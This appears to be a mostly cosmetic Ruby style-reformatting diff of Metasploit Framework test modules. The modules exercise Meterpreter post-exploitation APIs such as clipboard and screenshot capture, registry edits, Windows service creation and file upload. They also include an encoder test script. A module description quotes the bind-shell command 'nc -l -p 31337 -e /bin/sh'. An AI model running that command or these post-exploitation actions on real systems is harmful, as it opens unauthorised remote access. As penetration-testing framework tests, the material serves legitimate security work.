@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
udp_sock.put(buf) udp_sock.put(buf)
select(nil,nil,nil,2) select(nil, nil, nil, 2)
disconnect_udp disconnect_udp
end end

41
test/modules/exploits/test/shell.rb
View File

@ -3,38 +3,39 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Command Test', update_info(
'Description' => %q{ info,
This module tests cmd payloads by targeting (for example) a server 'Name' => 'Command Test',
like: nc -l -p 31337 -e /bin/sh 'Description' => %q{
}, This module tests cmd payloads by targeting (for example) a server
'Author' => 'egypt', like: nc -l -p 31337 -e /bin/sh
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
}, },
'Platform' => 'unix', 'Author' => 'egypt',
'Arch' => ARCH_CMD, 'References' => [ ],
'Targets' => 'DefaultOptions' => {},
[ 'Payload' => {
[ 'Automatic Targeting', { } ], },
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [
[ 'Automatic Targeting', {} ],
], ],
'DefaultTarget' => 0 'DefaultTarget' => 0
)) )
)
register_options( register_options(
[ [
Opt::RPORT(31337), Opt::RPORT(31337),
], self.class) ], self.class
)
end end
def autofilter def autofilter

18
test/modules/post/test/cmd_exec.rb
View File

@ -9,13 +9,16 @@ class MetasploitModule < Msf::Post
include Msf::Post::File include Msf::Post::File
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Meterpreter cmd_exec test', update_info(
'Description' => %q( This module will test the meterpreter cmd_exec API ), info,
'License' => MSF_LICENSE, 'Name' => 'Meterpreter cmd_exec test',
'Platform' => ['windows', 'linux', 'unix'], 'Description' => %q( This module will test the meterpreter cmd_exec API ),
'SessionTypes' => ['meterpreter'] 'License' => MSF_LICENSE,
)) 'Platform' => ['windows', 'linux', 'unix'],
'SessionTypes' => ['meterpreter']
)
)
end end
def test_cmd_exec def test_cmd_exec
@ -107,6 +110,5 @@ class MetasploitModule < Msf::Post
output == test_string output == test_string
end end
end end
end end
end end

44
test/modules/post/test/extapi.rb
View File

@ -1,4 +1,3 @@
require 'rex' require 'rex'
lib = File.join(Msf::Config.install_root, "test", "lib") lib = File.join(Msf::Config.install_root, "test", "lib")
@ -9,23 +8,24 @@ class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Test Meterpreter ExtAPI Stuff', update_info(
'Description' => %q{ This module will test Windows Extended API methods }, info,
'License' => MSF_LICENSE, 'Name' => 'Test Meterpreter ExtAPI Stuff',
'Author' => [ 'Ben Campbell'], 'Description' => %q{ This module will test Windows Extended API methods },
'Platform' => [ 'windows', ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter' ] 'Author' => [ 'Ben Campbell'],
)) 'Platform' => [ 'windows', ],
'SessionTypes' => [ 'meterpreter' ]
)
)
end end
# #
# Check the extension is loaded... # Check the extension is loaded...
# #
def setup def setup
unless session.extapi unless session.extapi
vprint_status("Loading extapi extension...") vprint_status("Loading extapi extension...")
begin begin
@ -60,9 +60,9 @@ class MetasploitModule < Msf::Post
it "should return clipboard jpg dimensions" do it "should return clipboard jpg dimensions" do
ret = false ret = false
#VK_PRINTSCREEN 154 Maybe needed on XP? # VK_PRINTSCREEN 154 Maybe needed on XP?
#VK_SNAPSHOT 44 # VK_SNAPSHOT 44
session.railgun.user32.keybd_event(44,0,0,0) session.railgun.user32.keybd_event(44, 0, 0, 0)
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0) session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
clipboard = session.extapi.clipboard.get_data(false) clipboard = session.extapi.clipboard.get_data(false)
@ -96,22 +96,22 @@ class MetasploitModule < Msf::Post
text = Rex::Text.rand_text_alphanumeric(1024) text = Rex::Text.rand_text_alphanumeric(1024)
ret = session.extapi.clipboard.set_text(text) ret = session.extapi.clipboard.set_text(text)
clipboard = session.extapi.clipboard.get_data(true) clipboard = session.extapi.clipboard.get_data(true)
ret = clipboard && clipboard.first && (clipboard.first[:type] == :text) && (clipboard.first[:data] == text) ret = clipboard && clipboard.first && (clipboard.first[:type] == :text) && (clipboard.first[:data] == text)
end end
if session.railgun.user32 if session.railgun.user32
it "should download clipboard jpg data" do it "should download clipboard jpg data" do
ret = false ret = false
#VK_PRINTSCREEN 154 Maybe needed on XP? # VK_PRINTSCREEN 154 Maybe needed on XP?
#VK_SNAPSHOT 44 # VK_SNAPSHOT 44
session.railgun.user32.keybd_event(44,0,0,0) session.railgun.user32.keybd_event(44, 0, 0, 0)
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0) session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
clipboard = session.extapi.clipboard.get_data(true) clipboard = session.extapi.clipboard.get_data(true)
if clipboard && clipboard.first && (clipboard.first[:type] == :jpg) && !(clipboard.first[:data].empty?) if clipboard && clipboard.first && (clipboard.first[:type] == :jpg) && !(clipboard.first[:data].empty?)
# JPG Magic Bytes # JPG Magic Bytes
ret = (clipboard.first[:data][0,2] == "\xFF\xD8") ret = (clipboard.first[:data][0, 2] == "\xFF\xD8")
end end
ret ret
@ -183,14 +183,14 @@ class MetasploitModule < Msf::Post
windows = session.extapi.window.enumerate(true, nil) windows = session.extapi.window.enumerate(true, nil)
if windows && windows.any? if windows && windows.any?
unknowns = windows.select {|w| w[:title] == "<unknown>"} unknowns = windows.select { |w| w[:title] == "<unknown>" }
ret = !unknowns.empty? ret = !unknowns.empty?
end end
ret ret
end end
parent = windows.select {|w| w[:title] =~ /program manager/i} parent = windows.select { |w| w[:title] =~ /program manager/i }
if parent && parent.first if parent && parent.first
it "should return an array of a windows children" do it "should return an array of a windows children" do

33
test/modules/post/test/get_env.rb
View File

@ -1,25 +1,27 @@
lib = File.join(Msf::Config.install_root, "test", "lib") lib = File.join(Msf::Config.install_root, "test", "lib")
require 'module_test' require 'module_test'
#load 'test/lib/module_test.rb' # load 'test/lib/module_test.rb'
#load 'lib/rex/text.rb' # load 'lib/rex/text.rb'
#load 'lib/msf/core/post/common.rb' # load 'lib/msf/core/post/common.rb'
class MetasploitModule < Msf::Post class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
include Msf::Post::Common include Msf::Post::Common
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Test Post::Common Get Envs', update_info(
'Description' => %q{ This module will test Post::Common get envs API methods }, info,
'License' => MSF_LICENSE, 'Name' => 'Test Post::Common Get Envs',
'Author' => [ 'Ben Campbell'], 'Description' => %q{ This module will test Post::Common get envs API methods },
'Platform' => [ 'windows', 'linux', 'java', 'python' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter', 'shell' ] 'Author' => [ 'Ben Campbell'],
)) 'Platform' => [ 'windows', 'linux', 'java', 'python' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
)
)
end end
def test_get_env_windows def test_get_env_windows
@ -41,7 +43,7 @@ class MetasploitModule < Msf::Post
it "should return user" do it "should return user" do
user = get_env('USER') user = get_env('USER')
!user.blank? !user.blank?
end end
it "should handle $ sign" do it "should handle $ sign" do
user = get_env('$USER') user = get_env('$USER')
@ -52,7 +54,7 @@ class MetasploitModule < Msf::Post
def test_get_envs def test_get_envs
it "should return multiple envs" do it "should return multiple envs" do
res = get_envs('PATH','USERNAME','USER') res = get_envs('PATH', 'USERNAME', 'USER')
if session.platform =~ /win/i if session.platform =~ /win/i
!res['PATH'].blank? && !res['USERNAME'].blank? !res['PATH'].blank? && !res['USERNAME'].blank?
else else
@ -62,4 +64,3 @@ class MetasploitModule < Msf::Post
end end
end end

57
test/modules/post/test/meterpreter.rb
View File

@ -1,4 +1,3 @@
require 'rex/post/meterpreter/extensions/stdapi/command_ids' require 'rex/post/meterpreter/extensions/stdapi/command_ids'
require 'rex' require 'rex'
@ -10,20 +9,24 @@ class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Testing Meterpreter Stuff', update_info(
'Description' => %q{ This module will test meterpreter API methods }, info,
'License' => MSF_LICENSE, 'Name' => 'Testing Meterpreter Stuff',
'Author' => [ 'egypt'], 'Description' => %q{ This module will test meterpreter API methods },
'Platform' => [ 'windows', 'linux', 'java' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter' ] 'Author' => [ 'egypt'],
)) 'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter' ]
)
)
register_options( register_options(
[ [
OptBool.new("AddEntropy" , [false, "Add entropy token to file and directory names.", false]), OptBool.new("AddEntropy", [false, "Add entropy token to file and directory names.", false]),
OptString.new("BaseFileName" , [true, "File/dir base name", "meterpreter-test"]) OptString.new("BaseFileName", [true, "File/dir base name", "meterpreter-test"])
], self.class) ], self.class
)
end end
# #
@ -81,7 +84,7 @@ class MetasploitModule < Msf::Post
ret &&= (list && list.length > 0) ret &&= (list && list.length > 0)
if session.commands.include? Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_GETPID if session.commands.include? Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_GETPID
pid ||= session.sys.process.getpid pid ||= session.sys.process.getpid
process = list.find{ |p| p['pid'] == pid } process = list.find { |p| p['pid'] == pid }
vprint_status("PID info: #{process.inspect}") vprint_status("PID info: #{process.inspect}")
ret &&= !(process.nil?) ret &&= !(process.nil?)
else else
@ -90,7 +93,6 @@ class MetasploitModule < Msf::Post
ret ret
end end
end end
def test_sys_config def test_sys_config
@ -125,7 +127,7 @@ class MetasploitModule < Msf::Post
ifaces = session.net.config.get_interfaces ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0) res = !!(ifaces and ifaces.length > 0)
res &&= !! ifaces.find { |iface| res &&= !!ifaces.find { |iface|
iface.addrs.find { |addr| iface.addrs.find { |addr|
addr == session.session_host addr == session.session_host
} }
@ -141,13 +143,12 @@ class MetasploitModule < Msf::Post
routes and routes.length > 0 routes and routes.length > 0
end end
end end
end end
def test_fs def test_fs
vprint_status("Starting filesystem tests") vprint_status("Starting filesystem tests")
if datastore["AddEntropy"] if datastore["AddEntropy"]
entropy_value = '-' + ('a'..'z').to_a.shuffle[0,8].join entropy_value = '-' + ('a'..'z').to_a.shuffle[0, 8].join
else else
entropy_value = "" entropy_value = ""
end end
@ -252,7 +253,7 @@ class MetasploitModule < Msf::Post
res = true res = true
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt" remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
vprint_status("Remote File Name: #{remote}") vprint_status("Remote File Name: #{remote}")
local = __FILE__ local = __FILE__
vprint_status("uploading") vprint_status("uploading")
session.fs.file.upload_file(remote, local) session.fs.file.upload_file(remote, local)
vprint_status("done") vprint_status("done")
@ -333,7 +334,7 @@ class MetasploitModule < Msf::Post
res = true res = true
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt" remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
vprint_status("Remote File Name: #{remote}") vprint_status("Remote File Name: #{remote}")
local = __FILE__ local = __FILE__
vprint_status("uploading") vprint_status("uploading")
session.fs.file.upload_file(remote, local) session.fs.file.upload_file(remote, local)
vprint_status("done") vprint_status("done")
@ -342,20 +343,19 @@ class MetasploitModule < Msf::Post
if res if res
remote_md5 = session.fs.file.md5(remote) remote_md5 = session.fs.file.md5(remote)
local_md5 = Digest::MD5.digest(::File.read(local, mode: 'rb')) local_md5 = Digest::MD5.digest(::File.read(local, mode: 'rb'))
remote_sha = session.fs.file.sha1(remote) remote_sha = session.fs.file.sha1(remote)
local_sha = Digest::SHA1.digest(::File.read(local, mode: 'rb')) local_sha = Digest::SHA1.digest(::File.read(local, mode: 'rb'))
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}") vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5, '')}")
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}") vprint_status("local md5 : #{Rex::Text.to_hex(local_md5, '')}")
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}") vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha, '')}")
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}") vprint_status("local sha : #{Rex::Text.to_hex(local_sha, '')}")
res &&= (remote_md5 == local_md5) res &&= (remote_md5 == local_md5)
end end
session.fs.file.rm(remote) session.fs.file.rm(remote)
res res
end end
end end
=begin =begin
@ -387,7 +387,7 @@ class MetasploitModule < Msf::Post
super super
end end
protected protected
def create_directory(name) def create_directory(name)
res = true res = true
@ -403,5 +403,4 @@ protected
res res
end end
end end

23
test/modules/post/test/railgun.rb
View File

@ -1,5 +1,3 @@
lib = File.join(Msf::Config.install_root, "test", "lib") lib = File.join(Msf::Config.install_root, "test", "lib")
require 'module_test' require 'module_test'
@ -9,14 +7,17 @@ class MetasploitModule < Msf::Post
include Msf::Post::File include Msf::Post::File
include Msf::Post::Windows::FileInfo include Msf::Post::Windows::FileInfo
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Railgun API Tests', update_info(
'Description' => %q{ This module will test railgun api functions }, info,
'License' => MSF_LICENSE, 'Name' => 'Railgun API Tests',
'Author' => [ 'Spencer McIntyre' ], 'Description' => %q{ This module will test railgun api functions },
'Platform' => [ 'linux', 'osx', 'windows' ] 'License' => MSF_LICENSE,
)) 'Author' => [ 'Spencer McIntyre' ],
'Platform' => [ 'linux', 'osx', 'windows' ]
)
)
end end
def test_api_function_calls_libc def test_api_function_calls_libc
@ -89,6 +90,7 @@ class MetasploitModule < Msf::Post
def test_api_function_file_info_windows def test_api_function_file_info_windows
return unless session.platform == 'windows' return unless session.platform == 'windows'
it "Should retrieve the win32k file version" do it "Should retrieve the win32k file version" do
path = expand_path('%WINDIR%\\system32\\win32k.sys') path = expand_path('%WINDIR%\\system32\\win32k.sys')
major, minor, build, revision, brand = file_version(path) major, minor, build, revision, brand = file_version(path)
@ -98,6 +100,7 @@ class MetasploitModule < Msf::Post
def test_api_function_calls_windows def test_api_function_calls_windows
return unless session.platform == 'windows' return unless session.platform == 'windows'
it "Should include error information in the results" do it "Should include error information in the results" do
ret = true ret = true
result = session.railgun.kernel32.GetCurrentProcess() result = session.railgun.kernel32.GetCurrentProcess()

42
test/modules/post/test/railgun_reverse_lookups.rb
View File

@ -1,4 +1,3 @@
## ##
# This module requires Metasploit: https://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
@ -14,43 +13,45 @@ class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'railgun_testing', update_info(
'Description' => %q{ This module will test railgun code used in post modules}, info,
'License' => MSF_LICENSE, 'Name' => 'railgun_testing',
'Author' => [ 'kernelsmith'], 'Description' => %q{ This module will test railgun code used in post modules},
'Platform' => [ 'windows' ] 'License' => MSF_LICENSE,
)) 'Author' => [ 'kernelsmith'],
'Platform' => [ 'windows' ]
)
)
register_options( register_options(
[ [
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]), OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]), OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]), OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]), OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
], self.class) ], self.class
)
end end
# #
# Return an array of windows constants names matching +winconst+ # Return an array of windows constants names matching +winconst+
# #
def select_const_names(winconst, filter_regex=nil) def select_const_names(winconst, filter_regex = nil)
session.railgun.constant_manager.select_const_names(winconst, filter_regex) session.railgun.constant_manager.select_const_names(winconst, filter_regex)
end end
# #
# Returns an array of windows error code names for a given windows error code matching +err_code+ # Returns an array of windows error code names for a given windows error code matching +err_code+
# #
def lookup_error(err_code, filter_regex=nil) def lookup_error(err_code, filter_regex = nil)
select_const_names(err_code, /^ERROR_/).select do |name| select_const_names(err_code, /^ERROR_/).select do |name|
name =~ filter_regex name =~ filter_regex
end end
end end
def test_static def test_static
it "should return a constant name given a const and a filter" do it "should return a constant name given a const and a filter" do
ret = true ret = true
results = select_const_names(4, /^SERVICE/) results = select_const_names(4, /^SERVICE/)
@ -78,16 +79,14 @@ class MetasploitModule < Msf::Post
ret ret
end end
end end
def test_datastore def test_datastore
if (datastore["WIN_CONST"]) if (datastore["WIN_CONST"])
it "should look up arbitrary constants" do it "should look up arbitrary constants" do
ret = true ret = true
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX']) results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}") # vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
ret ret
end end
@ -97,13 +96,10 @@ class MetasploitModule < Msf::Post
it "should look up arbitrary error codes" do it "should look up arbitrary error codes" do
ret = true ret = true
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX']) results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.inspect}") # vprint_status("RESULTS: #{results.class} #{results.inspect}")
ret ret
end end
end end
end end
end end

29
test/modules/post/test/registry.rb
View File

@ -1,4 +1,3 @@
## ##
# This module requires Metasploit: https://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
@ -15,23 +14,26 @@ class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Registry include Msf::Post::Windows::Registry
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'registry_post_testing', update_info(
'Description' => %q{ This module will test Post::Windows::Registry API methods }, info,
'License' => MSF_LICENSE, 'Name' => 'registry_post_testing',
'Author' => [ 'Description' => %q{ This module will test Post::Windows::Registry API methods },
'License' => MSF_LICENSE,
'Author' => [
'kernelsmith', # original 'kernelsmith', # original
'egypt', # PostTest conversion 'egypt', # PostTest conversion
], ],
'Platform' => [ 'windows' ] 'Platform' => [ 'windows' ]
)) )
)
end end
def test_0_registry_read def test_0_registry_read
it "should evaluate key existence" do it "should evaluate key existence" do
k_exists = registry_key_exist?(%q#HKCU\Environment#) k_exists = registry_key_exist?(%q#HKCU\Environment#)
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#) k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
(k_exists && !k_dne) (k_exists && !k_dne)
end end
@ -39,7 +41,7 @@ class MetasploitModule < Msf::Post
pending "should evaluate value existence" do pending "should evaluate value existence" do
# these methods are not implemented # these methods are not implemented
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP") v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf") v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
(v_exists && !v_dne) (v_exists && !v_dne)
end end
@ -99,7 +101,6 @@ class MetasploitModule < Msf::Post
ret ret
end end
end end
def test_1_registry_write def test_1_registry_write
@ -172,7 +173,6 @@ class MetasploitModule < Msf::Post
ret ret
end end
it "should delete unicode keys" do it "should delete unicode keys" do
ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
@ -185,9 +185,6 @@ class MetasploitModule < Msf::Post
ret ret
end end
end end
end end

31
test/modules/post/test/search.rb
View File

@ -1,4 +1,3 @@
require 'rex/post/meterpreter/extensions/stdapi/command_ids' require 'rex/post/meterpreter/extensions/stdapi/command_ids'
require 'rex' require 'rex'
@ -10,20 +9,24 @@ class MetasploitModule < Msf::Post
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Testing Meterpreter Search', update_info(
'Description' => %q{ This module will test the meterpreter search method }, info,
'License' => MSF_LICENSE, 'Name' => 'Testing Meterpreter Search',
'Author' => [ 'timwr'], 'Description' => %q{ This module will test the meterpreter search method },
'Platform' => [ 'windows', 'linux', 'java' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter' ] 'Author' => [ 'timwr'],
)) 'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter' ]
)
)
register_options( register_options(
[ [
OptBool.new("AddEntropy" , [false, "Add entropy token to file and directory names.", false]), OptBool.new("AddEntropy", [false, "Add entropy token to file and directory names.", false]),
OptString.new("BaseFileName" , [true, "File/dir base name", "meterpreter-test"]) OptString.new("BaseFileName", [true, "File/dir base name", "meterpreter-test"])
], self.class) ], self.class
)
end end
def setup def setup
@ -38,7 +41,7 @@ class MetasploitModule < Msf::Post
session.fs.dir.chdir(tmp) session.fs.dir.chdir(tmp)
if datastore["AddEntropy"] if datastore["AddEntropy"]
entropy_value = '-' + ('a'..'z').to_a.shuffle[0,8].join entropy_value = '-' + ('a'..'z').to_a.shuffle[0, 8].join
else else
entropy_value = "" entropy_value = ""
end end

68
test/modules/post/test/services.rb
View File

@ -13,27 +13,31 @@ class MetasploitModule < Msf::Post
include Msf::Post::Windows::Services include Msf::Post::Windows::Services
include Msf::ModuleTest::PostTest include Msf::ModuleTest::PostTest
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Test Post::Windows::Services', update_info(
'Description' => %q{ This module will test windows services methods within a shell}, info,
'License' => MSF_LICENSE, 'Name' => 'Test Post::Windows::Services',
'Author' => [ 'kernelsmith', 'egypt' ], 'Description' => %q{ This module will test windows services methods within a shell},
'Platform' => [ 'windows' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter', 'shell' ] 'Author' => [ 'kernelsmith', 'egypt' ],
)) 'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
)
)
register_options( register_options(
[ [
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]), OptString.new("QSERVICE", [true, "Service (keyname) to query", "winmgmt"]),
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]), OptString.new("NSERVICE", [true, "New Service (keyname) to create/del", "testes"]),
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]), OptString.new("SSERVICE", [true, "Service (keyname) to start/stop", "W32Time"]),
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]), OptString.new("DNAME", [true, "Display name used for create test", "Cool display name"]),
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]), OptString.new("BINPATH", [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto", OptEnum.new("MODE", [
["auto", "manual", "disable"] true, "Mode to use for startup/create tests", "auto",
]), ["auto", "manual", "disable"]
], self.class) ]),
], self.class
)
end end
def test_start def test_start
@ -65,7 +69,7 @@ class MetasploitModule < Msf::Post
ret &&= results.kind_of? Array ret &&= results.kind_of? Array
ret &&= results.length > 0 ret &&= results.length > 0
ret &&= results.select{|service| service[:name] == datastore["QSERVICE"]} ret &&= results.select { |service| service[:name] == datastore["QSERVICE"] }
ret ret
end end
@ -92,11 +96,11 @@ class MetasploitModule < Msf::Post
def test_create def test_create
it "should create a service #{datastore["NSERVICE"]}" do it "should create a service #{datastore["NSERVICE"]}" do
mode = case datastore["MODE"] mode = case datastore["MODE"]
when "disable"; START_TYPE_DISABLED when "disable"; START_TYPE_DISABLED
when "manual"; START_TYPE_MANUAL when "manual"; START_TYPE_MANUAL
when "auto"; START_TYPE_AUTO when "auto"; START_TYPE_AUTO
else; START_TYPE AUTO else; START_TYPE AUTO
end end
ret = service_create(datastore['NSERVICE'], ret = service_create(datastore['NSERVICE'],
display: datastore['DNAME'], display: datastore['DNAME'],
@ -151,16 +155,16 @@ class MetasploitModule < Msf::Post
ret = true ret = true
results = service_create(service_name, results = service_create(service_name,
display: display_name, display: display_name,
path: datastore['BINPATH'], path: datastore['BINPATH'],
starttype: START_TYPE_DISABLED) starttype: START_TYPE_DISABLED)
ret &&= (results == Windows::Error::SUCCESS) ret &&= (results == Windows::Error::SUCCESS)
results = service_status(service_name) results = service_status(service_name)
ret &&= results.kind_of? Hash ret &&= results.kind_of? Hash
if ret if ret
original_display = results[:display] original_display = results[:display]
results = service_change_config(service_name, {:display => Rex::Text.rand_text_alpha(5)}) results = service_change_config(service_name, { :display => Rex::Text.rand_text_alpha(5) })
ret &&= (results == Windows::Error::SUCCESS) ret &&= (results == Windows::Error::SUCCESS)
results = service_info(service_name) results = service_info(service_name)
@ -181,9 +185,9 @@ class MetasploitModule < Msf::Post
it "should start a disabled service #{service_name}" do it "should start a disabled service #{service_name}" do
ret = true ret = true
results = service_create(service_name, results = service_create(service_name,
display: display_name, display: display_name,
path: datastore['BINPATH'], path: datastore['BINPATH'],
starttype: START_TYPE_DISABLED) starttype: START_TYPE_DISABLED)
ret &&= (results == Windows::Error::SUCCESS) ret &&= (results == Windows::Error::SUCCESS)
if ret if ret

33
test/modules/post/test/unix.rb
View File

@ -1,12 +1,11 @@
lib = File.join(Msf::Config.install_root, "test", "lib") lib = File.join(Msf::Config.install_root, "test", "lib")
$:.push(lib) unless $:.include?(lib) $:.push(lib) unless $:.include?(lib)
require 'module_test' require 'module_test'
#load 'test/lib/module_test.rb' # load 'test/lib/module_test.rb'
#load 'lib/rex/text.rb' # load 'lib/rex/text.rb'
#load 'lib/msf/core/post/linux/system.rb' # load 'lib/msf/core/post/linux/system.rb'
#load 'lib/msf/core/post/unix/enum_user_dirs.rb' # load 'lib/msf/core/post/unix/enum_user_dirs.rb'
class MetasploitModule < Msf::Post class MetasploitModule < Msf::Post
@ -15,15 +14,18 @@ class MetasploitModule < Msf::Post
include Msf::Post::Unix include Msf::Post::Unix
include Msf::Post::Common include Msf::Post::Common
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Testing Remote Unix System Manipulation', update_info(
'Description' => %q{ This module will test Post::File API methods }, info,
'License' => MSF_LICENSE, 'Name' => 'Testing Remote Unix System Manipulation',
'Author' => [ 'egypt'], 'Description' => %q{ This module will test Post::File API methods },
'Platform' => [ 'linux', 'java' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter', 'shell' ] 'Author' => [ 'egypt'],
)) 'Platform' => [ 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
)
)
end end
def test_unix def test_unix
@ -36,6 +38,7 @@ class MetasploitModule < Msf::Post
if ret if ret
users.each { |u| users.each { |u|
next unless u[:name] == "root" next unless u[:name] == "root"
have_root = true have_root = true
} }
end end
@ -44,8 +47,6 @@ class MetasploitModule < Msf::Post
ret ret
end end
end end
end end

2
test/tests/00_create_all_modules_test.rb
View File

@ -6,7 +6,7 @@ describe Msf::Simple::Framework do
klass = mod klass = mod
it "should be able create #{ref}" do it "should be able create #{ref}" do
e = $msf.modules.create(ref) e = $msf.modules.create(ref)
e.should_not == nil e.should_not == nil
end end
end end
end end

5
test/tests/rakefile
View File

@ -1,7 +1,6 @@
require 'rubygems' require 'rubygems'
require 'spec/rake/spectask' require 'spec/rake/spectask'
Spec::Rake::SpecTask.new do |t| Spec::Rake::SpecTask.new do |t|
t.ruby_opts = ['-rtest/unit'] t.ruby_opts = ['-rtest/unit']
t.spec_files = FileList['*_test.rb'] t.spec_files = FileList['*_test.rb']
end end

89
test/tests/test_encoders.rb
View File

@ -1,5 +1,5 @@
# #
# Simple script to test a group of encoders against every exploit in the framework, # Simple script to test a group of encoders against every exploit in the framework,
# specifically for the exploits badchars, to see if a payload can be encoded. We ignore # specifically for the exploits badchars, to see if a payload can be encoded. We ignore
# the target arch/platform of the exploit as we just want to pull out real world bad chars. # the target arch/platform of the exploit as we just want to pull out real world bad chars.
# #
@ -17,101 +17,92 @@ $msf = Msf::Simple::Framework.create
EXPLOITS = $msf.exploits EXPLOITS = $msf.exploits
def print_line( message ) def print_line(message)
$stdout.puts( message ) $stdout.puts(message)
end end
def format_badchars( badchars ) def format_badchars(badchars)
str = '' str = ''
if( badchars ) if (badchars)
badchars.each_byte do | b | badchars.each_byte do |b|
str << "\\x%02X" % [ b ] str << "\\x%02X" % [ b ]
end end
end end
str str
end end
def encoder_v_payload( encoder_name, payload, verbose=false ) def encoder_v_payload(encoder_name, payload, verbose = false)
success = 0 success = 0
fail = 0 fail = 0
